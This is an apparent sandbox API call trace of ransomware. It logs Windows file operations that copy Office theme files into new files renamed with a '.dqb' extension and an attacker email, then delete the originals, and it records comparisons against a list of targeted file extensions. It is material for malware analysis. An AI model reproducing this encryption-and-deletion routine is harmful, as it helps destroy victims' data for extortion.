CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.748] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=937) returned 1 [0044.748] CloseHandle (hObject=0x1f8) returned 1 [0044.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20 [0044.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.748] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.748] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0045.114] GetLastError () returned 0x0 [0045.114] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x3a9, lpOverlapped=0x0) returned 1 [0045.240] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3b0, lpOverlapped=0x0) returned 1 [0045.241] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0045.241] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.241] SetEndOfFile (hFile=0x220) returned 1 [0045.241] CloseHandle (hObject=0x220) returned 1 [0045.241] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0045.241] SetEndOfFile (hFile=0x1f8) returned 1 [0045.242] CloseHandle (hObject=0x1f8) returned 1 [0045.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.242] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.242] lstrlenW (lpString=".doc") returned 4 [0045.242] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.242] lstrlenW (lpString=".docx") returned 5 [0045.242] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.242] lstrlenW (lpString=".pdf") returned 4 [0045.242] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".xls") returned 4 [0045.243] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".xlsx") returned 5 [0045.243] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.243] lstrlenW (lpString=".ppt") returned 4 [0045.243] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString=".zip") returned 4 [0045.243] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".rar") returned 4 [0045.243] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".bz2") returned 4 [0045.243] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString=".7z") returned 3 [0045.243] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString=".dbf") returned 4 [0045.243] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString=".1cd") returned 4 [0045.243] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString=".jpg") returned 4 [0045.243] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.243] lstrlenW (lpString=".doc") returned 4 [0045.243] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString=".docx") returned 5 [0045.243] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.243] lstrlenW (lpString=".pdf") returned 4 [0045.243] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".xls") returned 4 [0045.243] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".xlsx") returned 5 [0045.243] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.244] lstrlenW (lpString=".ppt") returned 4 [0045.244] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.244] lstrlenW (lpString=".zip") returned 4 [0045.244] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.244] lstrlenW (lpString=".rar") returned 4 [0045.244] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.244] lstrlenW (lpString=".bz2") returned 4 [0045.244] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.244] lstrlenW (lpString=".7z") returned 3 [0045.244] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.244] lstrlenW (lpString=".dbf") returned 4 [0045.244] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.244] lstrlenW (lpString=".1cd") returned 4 [0045.244] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0045.244] lstrlenW (lpString=".jpg") returned 4 [0045.244] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.244] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0045.244] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0045.735] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=27177) returned 1 [0045.735] CloseHandle (hObject=0x168) returned 1 [0045.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 0x20 [0045.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0045.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0045.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0045.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.736] GetLastError () returned 0x0 [0045.736] ReadFile (in: hFile=0x168, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x6a29, lpOverlapped=0x0) returned 1 [0045.738] WriteFile (in: hFile=0x210, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x6a30, lpOverlapped=0x0) returned 1 [0045.739] ReadFile (in: hFile=0x168, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0045.739] WriteFile (in: hFile=0x210, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.739] SetEndOfFile (hFile=0x210) returned 1 [0045.739] CloseHandle (hObject=0x210) returned 1 [0045.739] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0045.739] SetEndOfFile (hFile=0x168) returned 1 [0045.740] CloseHandle (hObject=0x168) returned 1 [0045.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.740] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0045.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.740] lstrlenW (lpString=".doc") returned 4 [0045.740] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.740] lstrlenW (lpString=".docx") returned 5 [0045.741] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.741] lstrlenW (lpString=".pdf") returned 4 [0045.741] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString=".xls") returned 4 [0045.741] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.741] lstrlenW (lpString=".xlsx") returned 5 [0045.741] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.741] lstrlenW (lpString=".ppt") returned 4 [0045.741] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString=".zip") returned 4 [0045.741] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.741] lstrlenW (lpString=".rar") returned 4 [0045.741] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.741] lstrlenW (lpString=".bz2") returned 4 [0045.741] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString=".7z") returned 3 [0045.741] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString=".dbf") returned 4 [0045.741] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString=".1cd") returned 4 [0045.741] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString=".jpg") returned 4 [0045.741] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.741] lstrlenW (lpString=".doc") returned 4 [0045.741] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.741] lstrlenW (lpString=".docx") returned 5 [0045.741] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.742] lstrlenW (lpString=".pdf") returned 4 [0045.742] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.742] lstrlenW (lpString=".xls") returned 4 [0045.742] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.742] lstrlenW (lpString=".xlsx") returned 5 [0045.742] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.742] lstrlenW (lpString=".ppt") returned 4 [0045.742] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.742] lstrlenW (lpString=".zip") returned 4 [0045.742] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.742] lstrlenW (lpString=".rar") returned 4 [0045.742] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.742] lstrlenW (lpString=".bz2") returned 4 [0045.742] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.742] lstrlenW (lpString=".7z") returned 3 [0045.742] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.742] lstrlenW (lpString=".dbf") returned 4 [0045.742] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.742] lstrlenW (lpString=".1cd") returned 4 [0045.742] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0045.742] lstrlenW (lpString=".jpg") returned 4 [0045.742] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.742] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0045.742] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.263] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=33479) returned 1 [0046.263] CloseHandle (hObject=0x160) returned 1 [0046.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20 [0046.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.264] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.264] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0046.264] GetLastError () returned 0x0 [0046.264] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x82c7, lpOverlapped=0x0) returned 1 [0046.280] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x82d0, lpOverlapped=0x0) returned 1 [0046.285] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0046.286] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.286] SetEndOfFile (hFile=0x220) returned 1 [0046.286] CloseHandle (hObject=0x220) returned 1 [0046.286] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.286] SetEndOfFile (hFile=0x160) returned 1 [0046.287] CloseHandle (hObject=0x160) returned 1 [0046.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.287] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.287] lstrlenW (lpString=".doc") returned 4 [0046.287] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.287] lstrlenW (lpString=".docx") returned 5 [0046.287] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.288] lstrlenW (lpString=".pdf") returned 4 [0046.288] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString=".xls") returned 4 [0046.288] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.288] lstrlenW (lpString=".xlsx") returned 5 [0046.288] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.288] lstrlenW (lpString=".ppt") returned 4 [0046.288] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString=".zip") returned 4 [0046.288] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.288] lstrlenW (lpString=".rar") returned 4 [0046.288] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.288] lstrlenW (lpString=".bz2") returned 4 [0046.288] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString=".7z") returned 3 [0046.288] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString=".dbf") returned 4 [0046.288] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString=".1cd") returned 4 [0046.288] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString=".jpg") returned 4 [0046.288] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.288] lstrlenW (lpString=".doc") returned 4 [0046.288] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString=".docx") returned 5 [0046.288] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.288] lstrlenW (lpString=".pdf") returned 4 [0046.288] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.288] lstrlenW (lpString=".xls") returned 4 [0046.289] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.289] lstrlenW (lpString=".xlsx") returned 5 [0046.289] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.289] lstrlenW (lpString=".ppt") returned 4 [0046.289] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.289] lstrlenW (lpString=".zip") returned 4 [0046.289] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.289] lstrlenW (lpString=".rar") returned 4 [0046.289] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.289] lstrlenW (lpString=".bz2") returned 4 [0046.289] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.289] lstrlenW (lpString=".7z") returned 3 [0046.289] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.289] lstrlenW (lpString=".dbf") returned 4 [0046.289] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.289] lstrlenW (lpString=".1cd") returned 4 [0046.289] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0046.289] lstrlenW (lpString=".jpg") returned 4 [0046.289] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.289] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.289] lstrlenW (lpString="FM20.CHM") returned 8 [0046.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 